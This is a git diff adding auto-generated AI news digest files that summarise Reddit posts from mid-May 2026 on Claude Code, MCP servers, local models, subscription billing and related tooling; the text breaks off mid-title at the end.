https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\"\_\_\_\_\_\_\_\_\_\_\_\\" in case u are copying i… + +--- + +## [Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?](https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *"Just use Sonnet for the cheap parts."* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured… + +--- + +## [Automated AI researcher running locally with llama.cpp](https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include. + +--- + +## [OpenAI's deployment company move says more about the AI gap than any benchmark[D]](https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/) +*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \~150 engineers). The pitch: embed "Forward Deployed Engineers" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between "model capability" and "production deployment" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should… + +--- + +## [You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits](https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A… + +--- + +## [I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.](https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no "any". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \- Verified MCP before writing a line \- Built 36 files in 12 minutes \- Wrote its own WebSocket smoke test (3ms broadcast) \- Zero errors first run \- Total cost: \~$2.50 Codex (GPT-5.5 via Cursor): \- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \- Task 2 shipped but needed a patch for infinite React loop \- 28 files, more compact architecture \- Total cost: \~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co… + +--- + +## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/) +*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. | [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?… + +--- + +## [Fully Realtime Interaction Models](https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/) + +--- + +## [Open-source, self-updating wiki for your codebase](https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work. + +--- + diff --git a/data/digest-2026-05-15.md b/data/digest-2026-05-15.md new file mode 100644 index 0000000..6efc82d --- /dev/null +++ b/data/digest-2026-05-15.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-15** | 15 stories | Auto-generated from 629 archived stories + +--- + +## [Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?](https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update + +> Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips. + +--- + +## [I built a free Google search MCP that actually works(searching, fetching, with PDF)](https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> ✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: "abstract"` returns \~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\~1500 chars), letting the agent triage relevance, then call `extract` with `mode… + +--- + +## [Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?](https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call. + +--- + +## [Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?](https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with "observability and accountability for ai agents" instead of "memory for ai agents". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months + +--- + +## [I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.](https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback. + +--- + +## [Built a tool that publishes HTML artifacts securely behind company auth](https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course. + +--- + +## [Anthropic built the agentic features. Now they're billing them separately.](https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic ("this was inevitable, the old model was broken") - About 15% neutral to supportive ("interactive use is untouched, this is fair") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. He said he now has to make the Claude Code experience on T3 Code "significantly worse." Ben Hylak (co-founder of Raindrop.ai) responded: "This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs." Theo also said: "Framing this as a free credit instead of a regression for… + +--- + +## [Adaptive Markdown](https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \-Turning articles and books into personalized learning objects \- lecture notes with automatically maintained structure \-documents with embedded code, tables, consoles, images, audio, or video \-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat… + +--- + +## [Memory drift? Context bloat? A Claude Code skill I wrote to manage long-running memory libraries](https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 0.99 +Tags: api_update, developer_tool + +> I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for "that bug we fixed last month" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** "Audit memory" runs the script. "Review session" walks the recent session and surfaces what's worth keeping.… + +--- + +## [SailPoint Unveils Agentic Fabric for AI Agent Security](https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security) +*AI Magazine* | Score: 0.70 +Tags: product_launch, agent_tool + +--- + +## [Open-weights vs. closed models: Nano Banana Pro was nerf'ed](https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/) +*Reddit r/StableDiffusion* | 16/05/2026 | Score: 1.00 +Tags: open_source + +> Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \[dev\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/… + +--- + +## [AllenAI has been iterating on their MolmoAct2 models for robotics](https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/) +*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 +Tags: open_source + +> r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look. + +--- + +## [Gemma4 26b MoE running in MLX with turboquant (and custom kernel)](https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/) +*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 +Tags: cli_tool + +> TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\_XS + q4\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y… + +--- + +## [Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]](https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/) +*Reddit r/MachineLearning* | 15/05/2026 | Score: 1.00 +Tags: api_update + +> Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said "I don't have inform… + +--- + +## [Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)](https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp + +> Claude Code learns your codebase by brute force every session. A single architectural question such as; "Where does request validation happen?" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, "we did it this way because" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f… + +--- + diff --git a/data/digest-2026-05-16.md b/data/digest-2026-05-16.md new file mode 100644 index 0000000..1c37077 --- /dev/null +++ b/data/digest-2026-05-16.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-16** | 15 stories | Auto-generated from 407 archived stories + +--- + +## [Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.](https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 +Tags: mcp, open_source, developer_tool, cli_tool + +> Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \- 100 apps (was 50) \- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \- back behavior wrong, no system back \- flat surfaces, no Material elevation \- tab bar where a nav drawer or bottom nav belongs \- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \- Product intent: hierarchy, flow, states. Invariant across platforms. \- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y… + +--- + +## [GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.](https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, open_source, github_release + +> Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm… + +--- + +## [macOS support in Lemonade has graduated out of beta!](https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk + +--- + +## [Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result](https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.94 +Tags: api_update, mcp, developer_tool + +> [error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: "sdk\_stream\_ended\_no\_result", had\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \[Stall\] stream\_idle\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context? + +--- + +## [WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. Does anyone know the solution?](https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t… + +--- + +## [I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I 